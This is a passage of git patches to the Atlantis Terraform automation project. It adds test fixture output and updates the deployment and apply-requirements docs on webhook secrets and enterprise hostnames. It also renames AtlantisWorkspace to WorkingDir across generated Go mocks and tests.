+++ b/server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt.act
@@ -0,0 +1,3 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- path: `runatlantis/atlantis-tests/production` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules/exp-output-plan-staging.txt.act b/server/testfixtures/test-repos/modules/exp-output-plan-staging.txt.act
new file mode 100644
index 0000000000..06b8c8c59d
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-plan-staging.txt.act
@@ -0,0 +1,31 @@
+Ran Plan in dir: `staging` workspace: `default`
+**Plan Error**
+```
+exit status 1: running "sh -c terraform init -no-color" in "/var/folders/z1/4z__7jv12y7f9yz__nwy55z40000gp/T/767048561/repos/runatlantis/atlantis-tests/2/default/staging": 
+Initializing modules...
+- module.null
+  Getting source "../modules/null"
+
+Initializing provider plugins...
+- Checking for available provider plugins on https://releases.hashicorp.com...
+
+Error installing provider "null": Get https://releases.hashicorp.com/terraform-provider-null/: dial tcp: lookup releases.hashicorp.com on 8.8.4.4:53: read udp 172.16.133.24:59000->8.8.4.4:53: i/o timeout.
+
+Terraform analyses the configuration and state and automatically downloads
+plugins for the providers used. However, when attempting to download this
+plugin an unexpected error occured.
+
+This may be caused if for some reason Terraform is unable to reach the
+plugin repository. The repository may be unreachable if access is blocked
+by a firewall.
+
+If automatic installation is not possible or desirable in your environment,
+you may alternatively manually install plugins by downloading a suitable
+distribution package and placing the plugin's executable file in the
+following directory:
+    terraform.d/plugins/darwin_amd64
+
+
+```
+
+

From 7c927a437fc4b80d65b3036a1e616d02c9fe30f7 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Wed, 27 Jun 2018 12:07:04 +0200
Subject: [PATCH 52/69] Update docs with changes from README

---
 runatlantis.io/docs/apply-requirements.md | 11 ++++++++---
 runatlantis.io/docs/deployment.md         | 24 ++++++++++++++++-------
 2 files changed, 25 insertions(+), 10 deletions(-)

diff --git a/runatlantis.io/docs/apply-requirements.md b/runatlantis.io/docs/apply-requirements.md
index 34a3048484..8f409a6439 100644
--- a/runatlantis.io/docs/apply-requirements.md
+++ b/runatlantis.io/docs/apply-requirements.md
@@ -11,7 +11,12 @@ projects:
   apply_requirements: [approved]
 ```
 
-## Next Steps
-For more information on GitHub pull request reviews and approvals see: [https://help.github.com/articles/about-pull-request-reviews/](https://help.github.com/articles/about-pull-request-reviews/)
+::: danger
+Please be aware that in GitHub **any user with read permissions** can approve a pull request.
+
+In GitLab, you [can set](https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html#editing-approvals) who is allowed to approve.
+:::
 
-For more information on GitLab merge request reviews and approvals (only supported on GitLab Enterprise) see: [https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html](https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html).
\ No newline at end of file
+## Next Steps
+* For more information on GitHub pull request reviews and approvals see: [https://help.github.com/articles/about-pull-request-reviews/](https://help.github.com/articles/about-pull-request-reviews/)
+* For more information on GitLab merge request reviews and approvals (only supported on GitLab Enterprise) see: [https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html](https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html).
\ No newline at end of file
diff --git a/runatlantis.io/docs/deployment.md b/runatlantis.io/docs/deployment.md
index e95e31ce73..d40dcb91c5 100644
--- a/runatlantis.io/docs/deployment.md
+++ b/runatlantis.io/docs/deployment.md
@@ -32,7 +32,7 @@ If installing on a single repository, navigate to the repository home page and c
 - Click **Add webhook**
 - set **Payload URL** to `http://$URL/events` where `$URL` is where Atlantis is hosted. **Be sure to add `/events`**
 - set **Content type** to `application/json`
-- set **Secret** to a random key (https://www.random.org/strings/). You'll need to pass this value to the `--gh-webhook-secret` option when you start Atlantis
+- set **Secret** to a random key (https://www.random.org/strings/). You'll need to pass this value to the `--gh-webhook-secret` flag when you start Atlantis
 - select **Let me select individual events**
 - check the boxes
 	- **Pull request reviews**
@@ -46,7 +46,7 @@ If installing on a single repository, navigate to the repository home page and c
 If you're using GitLab, navigate to your project's home page in GitLab
 - Click **Settings > Integrations** in the sidebar
 - set **URL** to `http://$URL/events` where `$URL` is where Atlantis is hosted. **Be sure to add `/events`**
-- leave **Secret Token** blank or set this to a random key (https://www.random.org/strings/). If you set it, you'll need to use the `--gitlab-webhook-secret` option when you start Atlantis
+- set **Secret Token** to a random key (https://www.random.org/strings/). You'll need to pass this value to the `--gitlab-webhook-secret` flag when you start Atlantis
 - check the boxes
     - **Push events**
     - **Comments**
@@ -76,20 +76,30 @@ Now you're ready to start Atlantis!
 
 If you're using GitHub, run:
 ```
-$ atlantis server --atlantis-url $URL --gh-user $USERNAME --gh-token $TOKEN --gh-webhook-secret $SECRET
-2049/10/6 00:00:00 [WARN] server: Atlantis started - listening on port 4141
+atlantis server --atlantis-url $URL --gh-user $USERNAME --gh-token $TOKEN --gh-webhook-secret $SECRET
+```
+
+If you're using GitHub Enterprise, run:
+```
+HOSTNAME=YOUR_GITHUB_ENTERPRISE_HOSTNAME # ex. github.runatlantis.io, without the scheme
+atlantis server --atlantis-url $URL --gh-user $USERNAME --gh-token $TOKEN --gh-webhook-secret $SECRET --gh-hostname $HOSTNAME
 ```
 
 If you're using GitLab, run:
 ```
-$ atlantis server --atlantis-url $URL --gitlab-user $USERNAME --gitlab-token $TOKEN --gitlab-webhook-secret $SECRET
-2049/10/6 00:00:00 [WARN] server: Atlantis started - listening on port 4141
+atlantis server --atlantis-url $URL --gitlab-user $USERNAME --gitlab-token $TOKEN --gitlab-webhook-secret $SECRET
+```
+
+If you're using GitLab Enterprise, run:
+```
+HOSTNAME=YOUR_GITLAB_ENTERPRISE_HOSTNAME # ex. gitlab.runatlantis.io, without the scheme
+atlantis server --atlantis-url $URL --gitlab-user $USERNAME --gitlab-token $TOKEN --gitlab-webhook-secret $SECRET --gitlab-hostname $HOSTNAME
 ```
 
 - `$URL` is the URL that Atlantis can be reached at
 - `$USERNAME` is the GitHub/GitLab username you generated the token for
 - `$TOKEN` is the access token you created. If you don't want this to be passed in as an argument for security reasons you can specify it in a config file (see [Configuration](#configuration)) or as an environment variable: `ATLANTIS_GH_TOKEN` or `ATLANTIS_GITLAB_TOKEN`
-- `$SECRET` is the random key you used for the webhook secret. If you left the secret blank then don't specify this flag. If you don't want this to be passed in as an argument for security reasons you can specify it in a config file (see [Configuration](#configuration)) or as an environment variable: `ATLANTIS_GH_WEBHOOK_SECRET` or `ATLANTIS_GITLAB_WEBHOOK_SECRET`
+- `$SECRET` is the random key you used for the webhook secret. If you don't want this to be passed in as an argument for security reasons you can specify it in a config file (see [Configuration](#configuration)) or as an environment variable: `ATLANTIS_GH_WEBHOOK_SECRET` or `ATLANTIS_GITLAB_WEBHOOK_SECRET`
 
 Atlantis is now running!
 **We recommend running it under something like Systemd or Supervisord.**

From 12f071b237a6f20676c788bae71bb79890e7109d Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Wed, 27 Jun 2018 20:43:43 +0200
Subject: [PATCH 53/69] Rename atlantisworkspace to workingdir.

---
 server/events/command_runner_test.go          | 16 ++---
 ...antis_workspace.go => mock_working_dir.go} | 70 +++++++++----------
 ...e_locker.go => mock_working_dir_locker.go} | 52 +++++++-------
 server/events/models/models.go                |  7 +-
 server/events/project_command_builder.go      | 44 ++++++------
 server/events/project_command_builder_test.go |  4 +-
 server/events/project_command_runner.go       | 53 +++++++-------
 server/events/project_command_runner_test.go  |  4 +-
 server/events/pull_closed_executor.go         |  8 +--
 server/events/pull_closed_executor_test.go    | 26 +++----
 .../{atlantis_workspace.go => working_dir.go} | 16 ++---
 ...kspace_locker.go => working_dir_locker.go} | 24 +++----
 ...ker_test.go => working_dir_locker_test.go} | 16 ++---
 server/events_controller_e2e_test.go          | 32 ++++-----
 server/server.go                              | 31 ++++----
 15 files changed, 205 insertions(+), 198 deletions(-)
 rename server/events/mocks/{mock_atlantis_workspace.go => mock_working_dir.go} (55%)
 rename server/events/mocks/{mock_atlantis_workspace_locker.go => mock_working_dir_locker.go} (52%)
 rename server/events/{atlantis_workspace.go => working_dir.go} (89%)
 rename server/events/{atlantis_workspace_locker.go => working_dir_locker.go} (70%)
 rename server/events/{atlantis_workspace_locker_test.go => working_dir_locker_test.go} (90%)

diff --git a/server/events/command_runner_test.go b/server/events/command_runner_test.go
index ff60cf2752..3367806eb9 100644
--- a/server/events/command_runner_test.go
+++ b/server/events/command_runner_test.go
@@ -39,7 +39,7 @@ var vcsClient *vcsmocks.MockClientProxy
 var ghStatus *mocks.MockCommitStatusUpdater
 var githubGetter *mocks.MockGithubPullGetter
 var gitlabGetter *mocks.MockGitlabMergeRequestGetter
-var workspaceLocker *mocks.MockAtlantisWorkspaceLocker
+var workspaceLocker *mocks.MockWorkingDirLocker
 var ch events.DefaultCommandRunner
 var logBytes *bytes.Buffer
 
@@ -48,7 +48,7 @@ func setup(t *testing.T) {
 	projectCommandBuilder = mocks.NewMockProjectCommandBuilder()
 	eventParsing = mocks.NewMockEventParsing()
 	ghStatus = mocks.NewMockCommitStatusUpdater()
-	workspaceLocker = mocks.NewMockAtlantisWorkspaceLocker()
+	workspaceLocker = mocks.NewMockWorkingDirLocker()
 	vcsClient = vcsmocks.NewMockClientProxy()
 	githubGetter = mocks.NewMockGithubPullGetter()
 	gitlabGetter = mocks.NewMockGitlabMergeRequestGetter()
@@ -166,11 +166,11 @@ func TestRunCommentCommand_ClosedPull(t *testing.T) {
 //		setup(t)
 //		cmd := events.CommentCommand{
 //			Name:      c,
-//			Workspace: "workspace",
+//			WorkingDir: "workspace",
 //		}
 //		When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
 //		When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil)
-//		When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true)
+//		When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.WorkingDir, fixtures.Pull.Num)).ThenReturn(true)
 //		switch c {
 //		case events.Plan:
 //			When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult)
@@ -184,7 +184,7 @@ func TestRunCommentCommand_ClosedPull(t *testing.T) {
 //		_, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments()
 //		Equals(t, cmdResult, response)
 //		vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString())
-//		workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)
+//		workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.WorkingDir, fixtures.Pull.Num)
 //	}
 //}
 
@@ -200,14 +200,14 @@ func TestRunCommentCommand_ClosedPull(t *testing.T) {
 //	cmdResponse := events.CommandResult{}
 //	cmd := events.CommentCommand{
 //		Name:      events.Plan,
-//		Workspace: "workspace",
+//		WorkingDir: "workspace",
 //	}
 //	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil)
 //	headRepo := fixtures.GithubRepo
 //	headRepo.FullName = "forkrepo/atlantis"
 //	headRepo.Owner = "forkrepo"
 //	When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, headRepo, nil)
-//	When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true)
+//	When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.WorkingDir, fixtures.Pull.Num)).ThenReturn(true)
 //	When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse)
 //
 //	ch.RunCommentCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, &cmd)
@@ -216,5 +216,5 @@ func TestRunCommentCommand_ClosedPull(t *testing.T) {
 //	_, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments()
 //	Equals(t, cmdResponse, response)
 //	vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString())
-//	workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)
+//	workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.WorkingDir, fixtures.Pull.Num)
 //}
diff --git a/server/events/mocks/mock_atlantis_workspace.go b/server/events/mocks/mock_working_dir.go
similarity index 55%
rename from server/events/mocks/mock_atlantis_workspace.go
rename to server/events/mocks/mock_working_dir.go
index 643813cede..f9040a3303 100644
--- a/server/events/mocks/mock_atlantis_workspace.go
+++ b/server/events/mocks/mock_working_dir.go
@@ -1,5 +1,5 @@
 // Automatically generated by pegomock. DO NOT EDIT!
-// Source: github.com/runatlantis/atlantis/server/events (interfaces: AtlantisWorkspace)
+// Source: github.com/runatlantis/atlantis/server/events (interfaces: WorkingDir)
 
 package mocks
 
@@ -11,15 +11,15 @@ import (
 	logging "github.com/runatlantis/atlantis/server/logging"
 )
 
-type MockAtlantisWorkspace struct {
+type MockWorkingDir struct {
 	fail func(message string, callerSkip ...int)
 }
 
-func NewMockAtlantisWorkspace() *MockAtlantisWorkspace {
-	return &MockAtlantisWorkspace{fail: pegomock.GlobalFailHandler}
+func NewMockWorkingDir() *MockWorkingDir {
+	return &MockWorkingDir{fail: pegomock.GlobalFailHandler}
 }
 
-func (mock *MockAtlantisWorkspace) Clone(log *logging.SimpleLogger, baseRepo models.Repo, headRepo models.Repo, p models.PullRequest, workspace string) (string, error) {
+func (mock *MockWorkingDir) Clone(log *logging.SimpleLogger, baseRepo models.Repo, headRepo models.Repo, p models.PullRequest, workspace string) (string, error) {
 	params := []pegomock.Param{log, baseRepo, headRepo, p, workspace}
 	result := pegomock.GetGenericMockFrom(mock).Invoke("Clone", params, []reflect.Type{reflect.TypeOf((*string)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
 	var ret0 string
@@ -35,9 +35,9 @@ func (mock *MockAtlantisWorkspace) Clone(log *logging.SimpleLogger, baseRepo mod
 	return ret0, ret1
 }
 
-func (mock *MockAtlantisWorkspace) GetWorkspace(r models.Repo, p models.PullRequest, workspace string) (string, error) {
+func (mock *MockWorkingDir) GetWorkingDir(r models.Repo, p models.PullRequest, workspace string) (string, error) {
 	params := []pegomock.Param{r, p, workspace}
-	result := pegomock.GetGenericMockFrom(mock).Invoke("GetWorkspace", params, []reflect.Type{reflect.TypeOf((*string)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+	result := pegomock.GetGenericMockFrom(mock).Invoke("GetWorkingDir", params, []reflect.Type{reflect.TypeOf((*string)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
 	var ret0 string
 	var ret1 error
 	if len(result) != 0 {
@@ -51,7 +51,7 @@ func (mock *MockAtlantisWorkspace) GetWorkspace(r models.Repo, p models.PullRequ
 	return ret0, ret1
 }
 
-func (mock *MockAtlantisWorkspace) Delete(r models.Repo, p models.PullRequest) error {
+func (mock *MockWorkingDir) Delete(r models.Repo, p models.PullRequest) error {
 	params := []pegomock.Param{r, p}
 	result := pegomock.GetGenericMockFrom(mock).Invoke("Delete", params, []reflect.Type{reflect.TypeOf((*error)(nil)).Elem()})
 	var ret0 error
@@ -63,41 +63,41 @@ func (mock *MockAtlantisWorkspace) Delete(r models.Repo, p models.PullRequest) e
 	return ret0
 }
 
-func (mock *MockAtlantisWorkspace) VerifyWasCalledOnce() *VerifierAtlantisWorkspace {
-	return &VerifierAtlantisWorkspace{mock, pegomock.Times(1), nil}
+func (mock *MockWorkingDir) VerifyWasCalledOnce() *VerifierWorkingDir {
+	return &VerifierWorkingDir{mock, pegomock.Times(1), nil}
 }
 
-func (mock *MockAtlantisWorkspace) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierAtlantisWorkspace {
-	return &VerifierAtlantisWorkspace{mock, invocationCountMatcher, nil}
+func (mock *MockWorkingDir) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierWorkingDir {
+	return &VerifierWorkingDir{mock, invocationCountMatcher, nil}
 }
 
-func (mock *MockAtlantisWorkspace) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierAtlantisWorkspace {
-	return &VerifierAtlantisWorkspace{mock, invocationCountMatcher, inOrderContext}
+func (mock *MockWorkingDir) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierWorkingDir {
+	return &VerifierWorkingDir{mock, invocationCountMatcher, inOrderContext}
 }
 
-type VerifierAtlantisWorkspace struct {
-	mock                   *MockAtlantisWorkspace
+type VerifierWorkingDir struct {
+	mock                   *MockWorkingDir
 	invocationCountMatcher pegomock.Matcher
 	inOrderContext         *pegomock.InOrderContext
 }
 
-func (verifier *VerifierAtlantisWorkspace) Clone(log *logging.SimpleLogger, baseRepo models.Repo, headRepo models.Repo, p models.PullRequest, workspace string) *AtlantisWorkspace_Clone_OngoingVerification {
+func (verifier *VerifierWorkingDir) Clone(log *logging.SimpleLogger, baseRepo models.Repo, headRepo models.Repo, p models.PullRequest, workspace string) *WorkingDir_Clone_OngoingVerification {
 	params := []pegomock.Param{log, baseRepo, headRepo, p, workspace}
 	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Clone", params)
-	return &AtlantisWorkspace_Clone_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+	return &WorkingDir_Clone_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
 }
 
-type AtlantisWorkspace_Clone_OngoingVerification struct {
-	mock              *MockAtlantisWorkspace
+type WorkingDir_Clone_OngoingVerification struct {
+	mock              *MockWorkingDir
 	methodInvocations []pegomock.MethodInvocation
 }
 
-func (c *AtlantisWorkspace_Clone_OngoingVerification) GetCapturedArguments() (*logging.SimpleLogger, models.Repo, models.Repo, models.PullRequest, string) {
+func (c *WorkingDir_Clone_OngoingVerification) GetCapturedArguments() (*logging.SimpleLogger, models.Repo, models.Repo, models.PullRequest, string) {
 	log, baseRepo, headRepo, p, workspace := c.GetAllCapturedArguments()
 	return log[len(log)-1], baseRepo[len(baseRepo)-1], headRepo[len(headRepo)-1], p[len(p)-1], workspace[len(workspace)-1]
 }
 
-func (c *AtlantisWorkspace_Clone_OngoingVerification) GetAllCapturedArguments() (_param0 []*logging.SimpleLogger, _param1 []models.Repo, _param2 []models.Repo, _param3 []models.PullRequest, _param4 []string) {
+func (c *WorkingDir_Clone_OngoingVerification) GetAllCapturedArguments() (_param0 []*logging.SimpleLogger, _param1 []models.Repo, _param2 []models.Repo, _param3 []models.PullRequest, _param4 []string) {
 	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
 	if len(params) > 0 {
 		_param0 = make([]*logging.SimpleLogger, len(params[0]))
@@ -124,23 +124,23 @@ func (c *AtlantisWorkspace_Clone_OngoingVerification) GetAllCapturedArguments()
 	return
 }
 
-func (verifier *VerifierAtlantisWorkspace) GetWorkspace(r models.Repo, p models.PullRequest, workspace string) *AtlantisWorkspace_GetWorkspace_OngoingVerification {
+func (verifier *VerifierWorkingDir) GetWorkingDir(r models.Repo, p models.PullRequest, workspace string) *WorkingDir_GetWorkingDir_OngoingVerification {
 	params := []pegomock.Param{r, p, workspace}
-	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "GetWorkspace", params)
-	return &AtlantisWorkspace_GetWorkspace_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "GetWorkingDir", params)
+	return &WorkingDir_GetWorkingDir_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
 }
 
-type AtlantisWorkspace_GetWorkspace_OngoingVerification struct {
-	mock              *MockAtlantisWorkspace
+type WorkingDir_GetWorkingDir_OngoingVerification struct {
+	mock              *MockWorkingDir
 	methodInvocations []pegomock.MethodInvocation
 }
 
-func (c *AtlantisWorkspace_GetWorkspace_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest, string) {
+func (c *WorkingDir_GetWorkingDir_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest, string) {
 	r, p, workspace := c.GetAllCapturedArguments()
 	return r[len(r)-1], p[len(p)-1], workspace[len(workspace)-1]
 }
 
-func (c *AtlantisWorkspace_GetWorkspace_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest, _param2 []string) {
+func (c *WorkingDir_GetWorkingDir_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest, _param2 []string) {
 	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
 	if len(params) > 0 {
 		_param0 = make([]models.Repo, len(params[0]))
@@ -159,23 +159,23 @@ func (c *AtlantisWorkspace_GetWorkspace_OngoingVerification) GetAllCapturedArgum
 	return
 }
 
-func (verifier *VerifierAtlantisWorkspace) Delete(r models.Repo, p models.PullRequest) *AtlantisWorkspace_Delete_OngoingVerification {
+func (verifier *VerifierWorkingDir) Delete(r models.Repo, p models.PullRequest) *WorkingDir_Delete_OngoingVerification {
 	params := []pegomock.Param{r, p}
 	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Delete", params)
-	return &AtlantisWorkspace_Delete_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+	return &WorkingDir_Delete_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
 }
 
-type AtlantisWorkspace_Delete_OngoingVerification struct {
-	mock              *MockAtlantisWorkspace
+type WorkingDir_Delete_OngoingVerification struct {
+	mock              *MockWorkingDir
 	methodInvocations []pegomock.MethodInvocation
 }
 
-func (c *AtlantisWorkspace_Delete_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest) {
+func (c *WorkingDir_Delete_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest) {
 	r, p := c.GetAllCapturedArguments()
 	return r[len(r)-1], p[len(p)-1]
 }
 
-func (c *AtlantisWorkspace_Delete_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest) {
+func (c *WorkingDir_Delete_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest) {
 	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
 	if len(params) > 0 {
 		_param0 = make([]models.Repo, len(params[0]))
diff --git a/server/events/mocks/mock_atlantis_workspace_locker.go b/server/events/mocks/mock_working_dir_locker.go
similarity index 52%
rename from server/events/mocks/mock_atlantis_workspace_locker.go
rename to server/events/mocks/mock_working_dir_locker.go
index a60f86a1e9..c6feb51680 100644
--- a/server/events/mocks/mock_atlantis_workspace_locker.go
+++ b/server/events/mocks/mock_working_dir_locker.go
@@ -1,5 +1,5 @@
 // Automatically generated by pegomock. DO NOT EDIT!
-// Source: github.com/runatlantis/atlantis/server/events (interfaces: AtlantisWorkspaceLocker)
+// Source: github.com/runatlantis/atlantis/server/events (interfaces: WorkingDirLocker)
 
 package mocks
 
@@ -9,15 +9,15 @@ import (
 	pegomock "github.com/petergtz/pegomock"
 )
 
-type MockAtlantisWorkspaceLocker struct {
+type MockWorkingDirLocker struct {
 	fail func(message string, callerSkip ...int)
 }
 
-func NewMockAtlantisWorkspaceLocker() *MockAtlantisWorkspaceLocker {
-	return &MockAtlantisWorkspaceLocker{fail: pegomock.GlobalFailHandler}
+func NewMockWorkingDirLocker() *MockWorkingDirLocker {
+	return &MockWorkingDirLocker{fail: pegomock.GlobalFailHandler}
 }
 
-func (mock *MockAtlantisWorkspaceLocker) TryLock(repoFullName string, workspace string, pullNum int) (func(), error) {
+func (mock *MockWorkingDirLocker) TryLock(repoFullName string, workspace string, pullNum int) (func(), error) {
 	params := []pegomock.Param{repoFullName, workspace, pullNum}
 	result := pegomock.GetGenericMockFrom(mock).Invoke("TryLock", params, []reflect.Type{reflect.TypeOf((*func())(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
 	var ret0 func()
@@ -33,46 +33,46 @@ func (mock *MockAtlantisWorkspaceLocker) TryLock(repoFullName string, workspace
 	return ret0, ret1
 }
 
-func (mock *MockAtlantisWorkspaceLocker) Unlock(repoFullName string, workspace string, pullNum int) {
+func (mock *MockWorkingDirLocker) Unlock(repoFullName string, workspace string, pullNum int) {
 	params := []pegomock.Param{repoFullName, workspace, pullNum}
 	pegomock.GetGenericMockFrom(mock).Invoke("Unlock", params, []reflect.Type{})
 }
 
-func (mock *MockAtlantisWorkspaceLocker) VerifyWasCalledOnce() *VerifierAtlantisWorkspaceLocker {
-	return &VerifierAtlantisWorkspaceLocker{mock, pegomock.Times(1), nil}
+func (mock *MockWorkingDirLocker) VerifyWasCalledOnce() *VerifierWorkingDirLocker {
+	return &VerifierWorkingDirLocker{mock, pegomock.Times(1), nil}
 }
 
-func (mock *MockAtlantisWorkspaceLocker) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierAtlantisWorkspaceLocker {
-	return &VerifierAtlantisWorkspaceLocker{mock, invocationCountMatcher, nil}
+func (mock *MockWorkingDirLocker) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierWorkingDirLocker {
+	return &VerifierWorkingDirLocker{mock, invocationCountMatcher, nil}
 }
 
-func (mock *MockAtlantisWorkspaceLocker) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierAtlantisWorkspaceLocker {
-	return &VerifierAtlantisWorkspaceLocker{mock, invocationCountMatcher, inOrderContext}
+func (mock *MockWorkingDirLocker) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierWorkingDirLocker {
+	return &VerifierWorkingDirLocker{mock, invocationCountMatcher, inOrderContext}
 }
 
-type VerifierAtlantisWorkspaceLocker struct {
-	mock                   *MockAtlantisWorkspaceLocker
+type VerifierWorkingDirLocker struct {
+	mock                   *MockWorkingDirLocker
 	invocationCountMatcher pegomock.Matcher
 	inOrderContext         *pegomock.InOrderContext
 }
 
-func (verifier *VerifierAtlantisWorkspaceLocker) TryLock(repoFullName string, workspace string, pullNum int) *AtlantisWorkspaceLocker_TryLock_OngoingVerification {
+func (verifier *VerifierWorkingDirLocker) TryLock(repoFullName string, workspace string, pullNum int) *WorkingDirLocker_TryLock_OngoingVerification {
 	params := []pegomock.Param{repoFullName, workspace, pullNum}
 	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "TryLock", params)
-	return &AtlantisWorkspaceLocker_TryLock_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+	return &WorkingDirLocker_TryLock_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
 }
 
-type AtlantisWorkspaceLocker_TryLock_OngoingVerification struct {
-	mock              *MockAtlantisWorkspaceLocker
+type WorkingDirLocker_TryLock_OngoingVerification struct {
+	mock              *MockWorkingDirLocker
 	methodInvocations []pegomock.MethodInvocation
 }
 
-func (c *AtlantisWorkspaceLocker_TryLock_OngoingVerification) GetCapturedArguments() (string, string, int) {
+func (c *WorkingDirLocker_TryLock_OngoingVerification) GetCapturedArguments() (string, string, int) {
 	repoFullName, workspace, pullNum := c.GetAllCapturedArguments()
 	return repoFullName[len(repoFullName)-1], workspace[len(workspace)-1], pullNum[len(pullNum)-1]
 }
 
-func (c *AtlantisWorkspaceLocker_TryLock_OngoingVerification) GetAllCapturedArguments() (_param0 []string, _param1 []string, _param2 []int) {
+func (c *WorkingDirLocker_TryLock_OngoingVerification) GetAllCapturedArguments() (_param0 []string, _param1 []string, _param2 []int) {
 	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
 	if len(params) > 0 {
 		_param0 = make([]string, len(params[0]))
@@ -91,23 +91,23 @@ func (c *AtlantisWorkspaceLocker_TryLock_OngoingVerification) GetAllCapturedArgu
 	return
 }
 
-func (verifier *VerifierAtlantisWorkspaceLocker) Unlock(repoFullName string, workspace string, pullNum int) *AtlantisWorkspaceLocker_Unlock_OngoingVerification {
+func (verifier *VerifierWorkingDirLocker) Unlock(repoFullName string, workspace string, pullNum int) *WorkingDirLocker_Unlock_OngoingVerification {
 	params := []pegomock.Param{repoFullName, workspace, pullNum}
 	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Unlock", params)
-	return &AtlantisWorkspaceLocker_Unlock_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+	return &WorkingDirLocker_Unlock_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
 }
 
-type AtlantisWorkspaceLocker_Unlock_OngoingVerification struct {
-	mock              *MockAtlantisWorkspaceLocker
+type WorkingDirLocker_Unlock_OngoingVerification struct {
+	mock              *MockWorkingDirLocker
